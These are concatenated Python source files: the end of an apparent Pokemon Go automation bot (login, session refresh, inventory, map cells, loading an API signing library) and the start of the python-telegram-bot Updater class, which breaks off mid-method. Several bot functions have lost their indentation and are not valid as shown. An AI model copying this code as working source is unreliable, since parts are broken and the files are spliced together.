'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
def tick(self):
    """Run one bot iteration: heartbeat, refresh cell data, then run workers."""
    self.health_record.heartbeat()
    self.cell = self.get_meta_cell()
    self.tick_count += 1
    # Check if session token has expired
    self.check_session(self.position[0:2])
    # Workers run in order; the first one reporting RUNNING claims the tick.
    for worker in self.workers:
        if worker.work() == WorkerResult.RUNNING:
            return
def get_meta_cell(self):
    """Merge the nearby map cells into a single dict of forts and pokemon.

    Keeps the previously cached fort list when the fresh response contains
    (almost) no forts, since fort data is fairly static.

    :return: dict with 'forts', 'wild_pokemons', 'catchable_pokemons' lists.
    """
    location = self.position[0:2]
    cells = self.find_close_cells(*location)
    # Combine all cells into a single dict of the items we care about.
    forts = []
    wild_pokemons = []
    catchable_pokemons = []
    for cell in cells:
        if "forts" in cell and len(cell["forts"]):
            forts += cell["forts"]
        if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
            wild_pokemons += cell["wild_pokemons"]
        if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
            catchable_pokemons += cell["catchable_pokemons"]
    # If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
    # NOTE(review): the guard is `> 1`, so a response with exactly one fort
    # also falls back to the cached fort list below — confirm intended.
    if len(forts) > 1 or not self.cell:
        return {
            "forts": forts,
            "wild_pokemons": wild_pokemons,
            "catchable_pokemons": catchable_pokemons
        }
    # If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
    else:
        return {
            "forts": self.cell["forts"],
            "wild_pokemons": wild_pokemons,
            "catchable_pokemons": catchable_pokemons
        }
def update_web_location(self, cells=None, lat=None, lng=None, alt=None):
    """Persist the bot's current position and map cells for the web UI.

    Can be called with no arguments: missing coordinates are read from the
    API's current position and cells are re-fetched around it.

    :param cells: Map cells to dump; fetched when omitted/empty.
    :param lat: Latitude; defaults to the API's current latitude.
    :param lng: Longitude; defaults to the API's current longitude.
    :param alt: Altitude; unused for now, defaults to 0.
    """
    # we can call the function with no arguments and still get the position
    # and map_cells
    if lat is None:
        lat = self.api._position_lat
    if lng is None:
        lng = self.api._position_lng
    if alt is None:
        alt = 0
    # BUG FIX: the old signature used a mutable default (cells=[]), which
    # is shared between calls; None is the safe sentinel.
    if not cells:
        location = self.position[0:2]
        cells = self.find_close_cells(*location)
    user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
    with open(user_data_cells, 'w') as outfile:
        json.dump(cells, outfile)
    user_web_location = os.path.join(
        _base_dir, 'web', 'location-%s.json' % self.config.username
    )
    # alt is unused atm but makes using *location easier
    try:
        with open(user_web_location, 'w') as outfile:
            json.dump({
                'lat': lat,
                'lng': lng,
                'alt': alt,
                'cells': cells
            }, outfile)
    except IOError as e:
        self.logger.info('[x] Error while opening location file: %s' % e)
    user_data_lastlocation = os.path.join(
        _base_dir, 'data', 'last-location-%s.json' % self.config.username
    )
    try:
        with open(user_data_lastlocation, 'w') as outfile:
            json.dump({'lat': lat, 'lng': lng, 'start_position': self.start_position}, outfile)
    except IOError as e:
        self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
    """Fetch map cells around (lat, lng), sorted by distance to their first fort.

    Cells without forts sort last (sentinel distance 1e6).

    :return: List of map-cell dicts; empty when the request did not succeed.
    """
    cellid = get_cell_ids(lat, lng)
    # One zero timestamp per requested cell id ("give me everything").
    timestamp = [0, ] * len(cellid)
    response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
    map_objects = response_dict.get(
        'responses', {}
    ).get('GET_MAP_OBJECTS', {})
    status = map_objects.get('status', None)
    map_cells = []
    if status and status == 1:
        map_cells = map_objects['map_cells']
        position = (lat, lng, 0)
        map_cells.sort(
            key=lambda x: distance(
                lat,
                lng,
                x['forts'][0]['latitude'],
                x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
        )
    return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
    """Re-login when the auth ticket is about to expire (<60s remaining).

    :param position: (lat, lng) tuple.
        NOTE(review): this argument is shadowed below by ``self.position``
        and is effectively unused — confirm before relying on it.
    """
    # Check session expiry
    if self.api._auth_provider and self.api._auth_provider._ticket_expire:
        # prevent crash if return not numeric value
        if not self.is_numeric(self.api._auth_provider._ticket_expire):
            self.logger.info("Ticket expired value is not numeric", 'yellow')
            return
        # Ticket expiry is in epoch milliseconds.
        remaining_time = \
            self.api._auth_provider._ticket_expire / 1000 - time.time()
        if remaining_time < 60:
            self.event_manager.emit(
                'api_error',
                sender=self,
                level='info',
                formatted='Session stale, re-logging in.'
            )
            # Rebuild the API wrapper from scratch, preserving the position.
            position = self.position
            self.api = ApiWrapper()
            self.position = position
            self.login()
            self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
    """Log into the API, retrying every 10 seconds until it succeeds.

    Emits login_started / login_failed / login_successful events so
    handlers (console, websocket) can report progress.
    """
    self.event_manager.emit(
        'login_started',
        sender=self,
        level='info',
        formatted="Login procedure started."
    )
    lat, lng = self.position[0:2]
    self.api.set_position(lat, lng, 0)
    # api.login returns falsy on failure; loop until it succeeds.
    while not self.api.login(
        self.config.auth_service,
        str(self.config.username),
        str(self.config.password)):
        self.event_manager.emit(
            'login_failed',
            sender=self,
            level='info',
            formatted="Login error, server busy. Waiting 10 seconds to try again."
        )
        time.sleep(10)
    self.event_manager.emit(
        'login_successful',
        sender=self,
        level='info',
        formatted="Login successful."
    )
def get_encryption_lib(self):
    """Locate the platform-specific encrypt library and return its full path.

    Exits the process when the library (or the platform) is unsupported,
    matching the existing fatal-error behaviour for a missing file.

    :return: Path to the encrypt shared library.
    :rtype: str
    """
    if _platform == "linux" or _platform == "linux2" or _platform == "darwin":
        file_name = 'encrypt.so'
    elif _platform == "Windows" or _platform == "win32":
        # Check if we are on 32 or 64 bit
        if sys.maxsize > 2**32:
            file_name = 'encrypt_64.dll'
        else:
            file_name = 'encrypt.dll'
    else:
        # BUG FIX: previously an unrecognised platform fell through with
        # file_name unbound and crashed with NameError further down.
        self.logger.error('Unsupported platform: ' + _platform)
        sys.exit(1)
    if self.config.encrypt_location == '':
        path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
    else:
        path = self.config.encrypt_location
    full_path = os.path.join(path, file_name)
    if not os.path.isfile(full_path):
        self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set libencrypt_location in config.')
        self.logger.info('Platform: '+ _platform + ' Encrypt.so directory: '+ path)
        sys.exit(1)
    else:
        self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' Encrypt.so directory: ' + path)
    return full_path
def _setup_api(self):
    """Create the API wrapper, set position, log in and prime local caches."""
    # instantiate pgoapi
    self.api = ApiWrapper()
    # provide player position on the earth
    self._set_starting_position()
    self.login()
    # chain subrequests (methods) into one RPC call
    self._print_character_info()
    # Signature encryption can only be activated after a successful login.
    self.api.activate_signature(self.get_encryption_lib())
    self.logger.info('')
    self.update_inventory()
    # send empty map_cells and then our position
    self.update_web_location()
def _print_character_info(self):
    """Fetch the player profile and log a summary (storage, currency, items).

    Caches the profile dict on ``self._player``. When the API returns no
    data the call retries recursively after a short sleep.
    """
    # get player profile call
    # ----------------------
    response_dict = self.api.get_player()
    if response_dict:
        self._player = response_dict['responses']['GET_PLAYER']['player_data']
        player = self._player
    else:
        self.logger.info(
            "The API didn't return player info, servers are unstable - "
            "retrying.", 'red'
        )
        sleep(5)
        self._print_character_info()
        # BUG FIX: without this return, execution fell through after the
        # retry and crashed with NameError on the unbound `player` below.
        return
    # @@@ TODO: Convert this to d/m/Y H:M:S
    # NOTE(review): creation_date is computed but never logged or returned.
    creation_date = datetime.datetime.fromtimestamp(
        player['creation_timestamp_ms'] / 1e3)
    creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
    pokecoins = '0'
    stardust = '0'
    items_stock = self.current_inventory()
    if 'amount' in player['currencies'][0]:
        pokecoins = player['currencies'][0]['amount']
    if 'amount' in player['currencies'][1]:
        stardust = player['currencies'][1]['amount']
    self.logger.info('')
    self.logger.info('--- {username} ---'.format(**player))
    self.get_player_info()
    self.logger.info(
        'Pokemon Bag: {}/{}'.format(
            self.get_inventory_count('pokemon'),
            player['max_pokemon_storage']
        )
    )
    self.logger.info(
        'Items: {}/{}'.format(
            self.get_inventory_count('item'),
            player['max_item_storage']
        )
    )
    self.logger.info(
        'Stardust: {}'.format(stardust) +
        ' | Pokecoins: {}'.format(pokecoins)
    )
    # Items Output
    self.logger.info(
        'PokeBalls: ' + str(items_stock[1]) +
        ' | GreatBalls: ' + str(items_stock[2]) +
        ' | UltraBalls: ' + str(items_stock[3]))
    self.logger.info(
        'RazzBerries: ' + str(items_stock[701]) +
        ' | BlukBerries: ' + str(items_stock[702]) +
        ' | NanabBerries: ' + str(items_stock[703]))
    self.logger.info(
        'LuckyEgg: ' + str(items_stock[301]) +
        ' | Incubator: ' + str(items_stock[902]) +
        ' | TroyDisk: ' + str(items_stock[501]))
    self.logger.info(
        'Potion: ' + str(items_stock[101]) +
        ' | SuperPotion: ' + str(items_stock[102]) +
        ' | HyperPotion: ' + str(items_stock[103]) +
        ' | MaxPotion: ' + str(items_stock[104]))
    self.logger.info(
        'Incense: ' + str(items_stock[401]) +
        ' | IncenseSpicy: ' + str(items_stock[402]) +
        ' | IncenseCool: ' + str(items_stock[403]))
    self.logger.info(
        'Revive: ' + str(items_stock[201]) +
        ' | MaxRevive: ' + str(items_stock[202]))
    self.logger.info('')
def use_lucky_egg(self):
    """Consume one Lucky Egg (item id 301) via the API and return the response."""
    lucky_egg_item_id = 301
    return self.api.use_item_xp_boost(item_id=lucky_egg_item_id)
def get_inventory(self):
    """Return the cached GET_INVENTORY response, fetching it on first use."""
    cached = self.latest_inventory
    if cached is None:
        # Lazily populate the cache; callers invalidate it by setting
        # latest_inventory back to None.
        cached = self.api.get_inventory()
        self.latest_inventory = cached
    return cached
def update_inventory(self):
    """Rebuild ``self.inventory`` with item entries from the inventory response."""
    # TODO: transition to using this inventory class everywhere
    init_inventory(self)
    response = self.get_inventory()
    self.inventory = list()
    inventory_items = response.get('responses', {}).get('GET_INVENTORY', {}).get(
        'inventory_delta', {}).get('inventory_items', {})
    if inventory_items:
        for item in inventory_items:
            item_info = item.get('inventory_item_data', {}).get('item', {})
            # Only keep entries that actually describe an item with a count.
            if {"item_id", "count"}.issubset(set(item_info.keys())):
                self.inventory.append(item['inventory_item_data']['item'])
def current_inventory(self):
    """Return {item_id: count} for all known item types.

    Item ids absent from the inventory report a count of 0. Also dumps the
    raw inventory data to the per-user web JSON file as a side effect.
    """
    inventory_req = self.get_inventory()
    inventory_dict = inventory_req['responses']['GET_INVENTORY'][
        'inventory_delta']['inventory_items']
    user_web_inventory = os.path.join(_base_dir, 'web', 'inventory-%s.json' % self.config.username)
    with open(user_web_inventory, 'w') as outfile:
        json.dump(inventory_dict, outfile)
    # get player items stock
    # ----------------------
    # Pre-seed every known item id with 0 so later lookups never KeyError.
    items_stock = {x.value: 0 for x in list(Item)}
    for item in inventory_dict:
        item_dict = item.get('inventory_item_data', {}).get('item', {})
        item_count = item_dict.get('count')
        item_id = item_dict.get('item_id')
        if item_count and item_id:
            if item_id in items_stock:
                items_stock[item_id] = item_count
    return items_stock
def item_inventory_count(self, id):
    """Count items currently held.

    :param id: An item id, or the string 'all' for every item at once.
    :return: A single count, or a dict of item_id -> count when 'all'.
    """
    inventory_dict = self.get_inventory()['responses'][
        'GET_INVENTORY']['inventory_delta']['inventory_items']
    if id == 'all':
        return self._all_items_inventory_count(inventory_dict)
    return self._item_inventory_count_per_id(id, inventory_dict)
def _item_inventory_count_per_id(self, id, inventory_dict):
item_count = 0
for item in inventory_dict:
item_dict = item.get('inventory_item_data', {}).get('item', {})
item_id = item_dict.get('item_id', False)
item_count = item_dict.get('count', False)
if item_id == int(id) and item_count:
return item_count
return 0
def _all_items_inventory_count(self, inventory_dict):
item_count_dict = {}
for item in inventory_dict:
item_dict = item.get('inventory_item_data', {}).get('item', {})
item_id = item_dict.get('item_id', False)
item_count = item_dict.get('count', False)
if item_id and item_count:
item_count_dict[item_id] = item_count
return item_count_dict
def _set_starting_position(self):
    """Resolve the bot's start position from config and/or the location cache.

    Order: explicit ``config.location`` first, then (when enabled) the
    cached last-known location. The cache is ignored when the configured
    start point differs from the one recorded with the cache. Exits the
    process when neither source yields a position.
    """
    self.event_manager.emit(
        'set_start_location',
        sender=self,
        level='info',
        formatted='Setting start location.'
    )
    has_position = False
    if self.config.test:
        # TODO: Add unit tests
        return
    if self.config.location:
        location_str = self.config.location
        location = self.get_pos_by_name(location_str.replace(" ", ""))
        msg = "Location found: {location} {position}"
        self.event_manager.emit(
            'location_found',
            sender=self,
            level='info',
            formatted=msg,
            data={
                'location': location_str,
                'position': location
            }
        )
        self.api.set_position(*location)
        self.event_manager.emit(
            'position_update',
            sender=self,
            level='info',
            formatted="Now at {current_position}",
            data={
                'current_position': self.position,
                'last_position': '',
                'distance': '',
                'distance_unit': ''
            }
        )
        self.start_position = self.position
        has_position = True
    if self.config.location_cache:
        try:
            # save location flag used to pull the last known location from
            # the location.json
            self.event_manager.emit(
                'load_cached_location',
                sender=self,
                level='debug',
                formatted='Loading cached location...'
            )
            with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
                    self.config.username)) as f:
                location_json = json.load(f)
            location = (
                location_json['lat'],
                location_json['lng'],
                0.0
            )
            # If location has been set in config, only use cache if starting position has not differed
            if has_position and 'start_position' in location_json:
                last_start_position = tuple(location_json.get('start_position', []))
                # Start position has to have been set on a previous run to do this check
                if last_start_position and last_start_position != self.start_position:
                    msg = 'Going to a new place, ignoring cached location.'
                    self.event_manager.emit(
                        'location_cache_ignored',
                        sender=self,
                        level='debug',
                        formatted=msg
                    )
                    return
            self.api.set_position(*location)
            self.event_manager.emit(
                'position_update',
                sender=self,
                level='debug',
                formatted='Loaded location {current_position} from cache',
                data={
                    'current_position': location,
                    'last_position': '',
                    'distance': '',
                    'distance_unit': ''
                }
            )
            has_position = True
        except Exception:
            # A cache problem is fatal only when no position was configured.
            if has_position is False:
                sys.exit(
                    "No cached Location. Please specify initial location."
                )
            self.event_manager.emit(
                'location_cache_error',
                sender=self,
                level='debug',
                formatted='Parsing cached location failed.'
            )
def get_pos_by_name(self, location_name):
    """Turn a location string into a (lat, lng, alt) tuple of floats.

    A string containing exactly two decimal-degree numbers is used
    directly; anything else is geocoded via Google Maps.
    """
    # Check if the given location is already a coordinate.
    if ',' in location_name:
        # NOTE(review): non-raw regex string; `\d` emits a DeprecationWarning
        # on Python 3 — should become r"..." if this code is ported.
        possible_coordinates = re.findall(
            "[-]?\d{1,3}[.]\d{3,7}", location_name
        )
        if len(possible_coordinates) == 2:
            # 2 matches, this must be a coordinate. We'll bypass the Google
            # geocode so we keep the exact location.
            self.logger.info(
                '[x] Coordinates found in passed in location, '
                'not geocoding.'
            )
            return float(possible_coordinates[0]), float(possible_coordinates[1]), float("0.0")
    geolocator = GoogleV3(api_key=self.config.gmapkey)
    loc = geolocator.geocode(location_name, timeout=10)
    return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
    """Prune expired fort cooldowns and send a keep-alive API request."""
    # Remove forts that we can now spin again.
    # NOTE: `.iteritems()` is Python 2 only; this codebase targets Python 2.
    self.fort_timeouts = {id: timeout for id, timeout
                          in self.fort_timeouts.iteritems()
                          if timeout >= time.time() * 1000}
    request = self.api.create_request()
    request.get_player()
    request.check_awarded_badges()
    request.call()
    # Queue has maxsize=1: a full queue just means an update is pending.
    try:
        self.web_update_queue.put_nowait(True) # do this outside of thread every tick
    except Queue.Full:
        pass
def update_web_location_worker(self):
    """Thread target meant to push location updates to the web UI.

    Currently a no-op; the original loop is kept below, disabled.
    """
    pass
    # while True:
    #     self.web_update_queue.get()
    #     self.update_web_location()
def get_inventory_count(self, what):
    """Count pokemon and/or items in the inventory.

    :param what: String containing 'pokemon' and/or 'item' to select the counter.
    :return: The requested count; the string '0' when the inventory response
        was empty or *what* matched neither keyword.
    """
    response_dict = self.get_inventory()
    inventory_items = response_dict.get('responses', {}).get('GET_INVENTORY', {}).get(
        'inventory_delta', {}).get('inventory_items', {})
    if inventory_items:
        pokecount = 0
        # NOTE(review): itemcount starts at 1, not 0 — looks like an
        # off-by-one; confirm whether it deliberately counts something
        # (e.g. the permanent incubator) before changing.
        itemcount = 1
        for item in inventory_items:
            if 'inventory_item_data' in item:
                if 'pokemon_data' in item['inventory_item_data']:
                    pokecount += 1
                itemcount += item['inventory_item_data'].get('item', {}).get('count', 0)
        if 'pokemon' in what:
            return pokecount
        if 'item' in what:
            return itemcount
    # NOTE(review): returns the *string* '0' while the branches above
    # return ints — callers comparing numerically should beware.
    return '0'
def get_player_info(self):
    """Log level/XP and capture statistics from the player_stats inventory entry."""
    response_dict = self.get_inventory()
    inventory_items = response_dict.get('responses', {}).get('GET_INVENTORY', {}).get(
        'inventory_delta', {}).get('inventory_items', {})
    if inventory_items:
        # NOTE(review): pokecount/itemcount are never used in this method.
        pokecount = 0
        itemcount = 1
        for item in inventory_items:
            # print('item {}'.format(item))
            playerdata = item.get('inventory_item_data', {}).get('player_stats')
            if playerdata:
                # XP still required to reach the next level.
                nextlvlxp = (int(playerdata.get('next_level_xp', 0)) - int(playerdata.get('experience', 0)))
                if 'level' in playerdata and 'experience' in playerdata:
                    self.logger.info(
                        'Level: {level}'.format(
                            **playerdata) +
                        ' (Next Level: {} XP)'.format(
                            nextlvlxp) +
                        ' (Total: {experience} XP)'
                        ''.format(**playerdata))
                if 'pokemons_captured' in playerdata and 'poke_stop_visits' in playerdata:
                    self.logger.info(
                        'Pokemon Captured: '
                        '{pokemons_captured}'.format(
                            **playerdata) +
                        ' | Pokestops Visited: '
                        '{poke_stop_visits}'.format(
                            **playerdata))
def has_space_for_loot(self):
    """Whether the item bag can absorb a pokestop spin (~5 new items)."""
    headroom_needed = 5
    max_items = self._player['max_item_storage']
    return self.get_inventory_count('item') < max_items - headroom_needed
def get_forts(self, order_by_distance=False):
    """Return forts from the current cell, optionally nearest-first.

    Only entries carrying both 'latitude' and 'type' keys are kept
    (i.e. forts with usable coordinates).
    """
    usable_forts = [
        fort for fort in self.cell['forts']
        if 'latitude' in fort and 'type' in fort
    ]
    if order_by_distance:
        here_lat, here_lng = self.position[0], self.position[1]
        usable_forts.sort(key=lambda fort: distance(
            here_lat,
            here_lng,
            fort['latitude'],
            fort['longitude']
        ))
    return usable_forts
def get_map_objects(self, lat, lng, timestamp, cellid):
    """Fetch GET_MAP_OBJECTS, throttled by ``config.map_object_cache_time``.

    Returns the cached response when called again inside the cache window,
    to avoid hammering the server every tick.
    """
    if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
        return self.last_map_object
    self.last_map_object = self.api.get_map_objects(
        latitude=f2i(lat),
        longitude=f2i(lng),
        since_timestamp_ms=timestamp,
        cell_id=cellid
    )
    self.last_time_map_object = time.time()
    return self.last_map_object
|
updater.py | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the class Updater, which tries to make creating Telegram bots intuitive."""
import logging
import os
import ssl
import warnings
from threading import Thread, Lock, current_thread, Event
from time import sleep
import subprocess
from signal import signal, SIGINT, SIGTERM, SIGABRT
from queue import Queue
from telegram import Bot, TelegramError
from telegram.ext import Dispatcher, JobQueue
from telegram.error import Unauthorized, InvalidToken, RetryAfter
from telegram.utils.request import Request
from telegram.utils.webhookhandler import (WebhookServer, WebhookHandler)
logging.getLogger(__name__).addHandler(logging.NullHandler())
class Updater(object):
"""
This class, which employs the :class:`telegram.ext.Dispatcher`, provides a frontend to
:class:`telegram.Bot` to the programmer, so they can focus on coding the bot. Its purpose is to
receive the updates from Telegram and to deliver them to said dispatcher. It also runs in a
separate thread, so the user can interact with the bot, for example on the command line. The
dispatcher supports handlers for different kinds of data: Updates from Telegram, basic text
commands and even arbitrary types. The updater can be started as a polling service or, for
production, use a webhook to receive updates. This is achieved using the WebhookServer and
WebhookHandler classes.
Attributes:
bot (:class:`telegram.Bot`): The bot used with this Updater.
user_sig_handler (:obj:`signal`): signals the updater will respond to.
update_queue (:obj:`Queue`): Queue for the updates.
job_queue (:class:`telegram.ext.JobQueue`): Jobqueue for the updater.
dispatcher (:class:`telegram.ext.Dispatcher`): Dispatcher that handles the updates and
dispatches them to the handlers.
running (:obj:`bool`): Indicates if the updater is running.
Args:
token (:obj:`str`, optional): The bot's token given by the @BotFather.
base_url (:obj:`str`, optional): Base_url for the bot.
workers (:obj:`int`, optional): Amount of threads in the thread pool for functions
decorated with ``@run_async``.
bot (:class:`telegram.Bot`, optional): A pre-initialized bot instance. If a pre-initialized
bot is used, it is the user's responsibility to create it using a `Request`
instance with a large enough connection pool.
user_sig_handler (:obj:`function`, optional): Takes ``signum, frame`` as positional
arguments. This will be called when a signal is received, defaults are (SIGINT,
SIGTERM, SIGABRT) setable with :attr:`idle`.
request_kwargs (:obj:`dict`, optional): Keyword args to control the creation of a request
object (ignored if `bot` argument is used).
Note:
You must supply either a :attr:`bot` or a :attr:`token` argument.
Raises:
ValueError: If both :attr:`token` and :attr:`bot` are passed or none of them.
"""
# Shared Request instance; created in __init__ only when no pre-built bot is supplied.
_request = None
def __init__(self,
             token=None,
             base_url=None,
             workers=4,
             bot=None,
             user_sig_handler=None,
             request_kwargs=None):
    # Exactly one of `token` / `bot` must be provided (see class docstring).
    if (token is None) and (bot is None):
        raise ValueError('`token` or `bot` must be passed')
    if (token is not None) and (bot is not None):
        raise ValueError('`token` and `bot` are mutually exclusive')
    self.logger = logging.getLogger(__name__)
    con_pool_size = workers + 4
    if bot is not None:
        self.bot = bot
        # A user-supplied bot may have been built with too small a pool;
        # warn rather than fail.
        if bot.request.con_pool_size < con_pool_size:
            self.logger.warning(
                'Connection pool of Request object is smaller than optimal value (%s)',
                con_pool_size)
    else:
        # we need a connection pool the size of:
        # * for each of the workers
        # * 1 for Dispatcher
        # * 1 for polling Updater (even if webhook is used, we can spare a connection)
        # * 1 for JobQueue
        # * 1 for main thread
        if request_kwargs is None:
            request_kwargs = {}
        if 'con_pool_size' not in request_kwargs:
            request_kwargs['con_pool_size'] = con_pool_size
        self._request = Request(**request_kwargs)
        self.bot = Bot(token, base_url, request=self._request)
    self.user_sig_handler = user_sig_handler
    self.update_queue = Queue()
    self.job_queue = JobQueue(self.bot)
    # Set by any managed thread that dies with an unhandled exception
    # (see _thread_wrapper).
    self.__exception_event = Event()
    self.dispatcher = Dispatcher(
        self.bot,
        self.update_queue,
        job_queue=self.job_queue,
        workers=workers,
        exception_event=self.__exception_event)
    self.last_update_id = 0
    self.running = False
    self.is_idle = False
    self.httpd = None
    self.__lock = Lock()
    # Threads started via _init_thread, joined on shutdown.
    self.__threads = []
def _init_thread(self, target, name, *args, **kwargs):
    """Start *target* on a named thread tracked in ``self.__threads``.

    The callable is run through _thread_wrapper so unhandled exceptions
    set the shared exception event before propagating.
    """
    thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)
    thr.start()
    self.__threads.append(thr)
def _thread_wrapper(self, target, *args, **kwargs):
    """Run *target*, flagging ``self.__exception_event`` on unhandled errors.

    The exception is logged and re-raised so the thread still terminates
    loudly rather than silently swallowing the failure.
    """
    thr_name = current_thread().name
    self.logger.debug('{0} - started'.format(thr_name))
    try:
        target(*args, **kwargs)
    except Exception:
        self.__exception_event.set()
        self.logger.exception('unhandled exception')
        raise
    self.logger.debug('{0} - ended'.format(thr_name))
def start_polling(self,
                  poll_interval=0.0,
                  timeout=10,
                  network_delay=None,
                  clean=False,
                  bootstrap_retries=0,
                  read_latency=2.,
                  allowed_updates=None):
    """Starts polling updates from Telegram.
    Args:
        poll_interval (:obj:`float`, optional): Time to wait between polling updates from
            Telegram in seconds. Default is 0.0.
        timeout (:obj:`float`, optional): Passed to :attr:`telegram.Bot.get_updates`.
        clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
            before actually starting to poll. Default is False.
        bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
            `Updater` will retry on failures on the Telegram server.
            * < 0 - retry indefinitely
            *   0 - no retries (default)
            * > 0 - retry up to X times
        allowed_updates (List[:obj:`str`], optional): Passed to
            :attr:`telegram.Bot.get_updates`.
        read_latency (:obj:`float` | :obj:`int`, optional): Grace time in seconds for receiving
            the reply from server. Will be added to the `timeout` value and used as the read
            timeout from server (Default: 2).
        network_delay: Deprecated. Will be honoured as :attr:`read_latency` for a while but
            will be removed in the future.
    Returns:
        :obj:`Queue`: The update queue that can be filled from the main thread.
    """
    # Honour the deprecated alias until it is removed.
    if network_delay is not None:
        warnings.warn('network_delay is deprecated, use read_latency instead')
        read_latency = network_delay
    with self.__lock:
        # Idempotent: a second call while running is a no-op.
        if not self.running:
            self.running = True
            # Create & start threads
            self.job_queue.start()
            self._init_thread(self.dispatcher.start, "dispatcher")
            self._init_thread(self._start_polling, "updater", poll_interval, timeout,
                              read_latency, bootstrap_retries, clean, allowed_updates)
    # Return the update queue so the main thread can insert updates
    return self.update_queue
def start_webhook(self,
                  listen='127.0.0.1',
                  port=80,
                  url_path='',
                  cert=None,
                  key=None,
                  clean=False,
                  bootstrap_retries=0,
                  webhook_url=None,
                  allowed_updates=None):
    """
    Starts a small http server to listen for updates via webhook. If cert
    and key are not provided, the webhook will be started directly on
    http://listen:port/url_path, so SSL can be handled by another
    application. Else, the webhook will be started on
    https://listen:port/url_path
    Args:
        listen (:obj:`str`, optional): IP-Address to listen on. Default ``127.0.0.1``.
        port (:obj:`int`, optional): Port the bot should be listening on. Default ``80``.
        url_path (:obj:`str`, optional): Path inside url.
        cert (:obj:`str`, optional): Path to the SSL certificate file.
        key (:obj:`str`, optional): Path to the SSL key file.
        clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
            before actually starting the webhook. Default is ``False``.
        bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
            `Updater` will retry on failures on the Telegram server.
            * < 0 - retry indefinitely
            *   0 - no retries (default)
            * > 0 - retry up to X times
        webhook_url (:obj:`str`, optional): Explicitly specify the webhook url. Useful behind
            NAT, reverse proxy, etc. Default is derived from `listen`, `port` & `url_path`.
        allowed_updates (List[:obj:`str`], optional): Passed to
            :attr:`telegram.Bot.set_webhook`.
    Returns:
        :obj:`Queue`: The update queue that can be filled from the main thread.
    """
    with self.__lock:
        # Idempotent: a second call while running is a no-op.
        if not self.running:
            self.running = True
            # Create & start threads
            self.job_queue.start()
            # FIX: a stray trailing comma previously turned this statement
            # into a one-element tuple expression (harmless but a typo).
            self._init_thread(self.dispatcher.start, "dispatcher")
            self._init_thread(self._start_webhook, "updater", listen, port, url_path, cert,
                              key, bootstrap_retries, clean, webhook_url, allowed_updates)
    # Return the update queue so the main thread can insert updates
    return self.update_queue
def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,
                   allowed_updates):
    """Thread target of thread 'updater'.

    Runs in background, pulls updates from Telegram and inserts them in the
    update queue of the Dispatcher.
    """
    cur_interval = poll_interval
    self.logger.debug('Updater thread started')

    # Clear any previously registered webhook (webhook_url='') before polling.
    self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None)

    while self.running:
        try:
            updates = self.bot.get_updates(
                self.last_update_id,
                timeout=timeout,
                read_latency=read_latency,
                allowed_updates=allowed_updates)
        except RetryAfter as e:
            # Flood control: wait as long as the server asked, plus a margin.
            self.logger.info(str(e))
            cur_interval = 0.5 + e.retry_after
        except TelegramError as te:
            self.logger.error("Error while getting Updates: {0}".format(te))
            # Put the error into the update queue and let the Dispatcher
            # broadcast it
            self.update_queue.put(te)
            # Back off (capped) on repeated failures.
            cur_interval = self._increase_poll_interval(cur_interval)
        else:
            if not self.running:
                # Stopped while the request was in flight; do not consume.
                if len(updates) > 0:
                    self.logger.debug('Updates ignored and will be pulled '
                                      'again on restart.')
                break

            if updates:
                for update in updates:
                    self.update_queue.put(update)
                # Acknowledge the batch by advancing the offset past the last id.
                self.last_update_id = updates[-1].update_id + 1

            # Successful fetch: reset back-off to the configured interval.
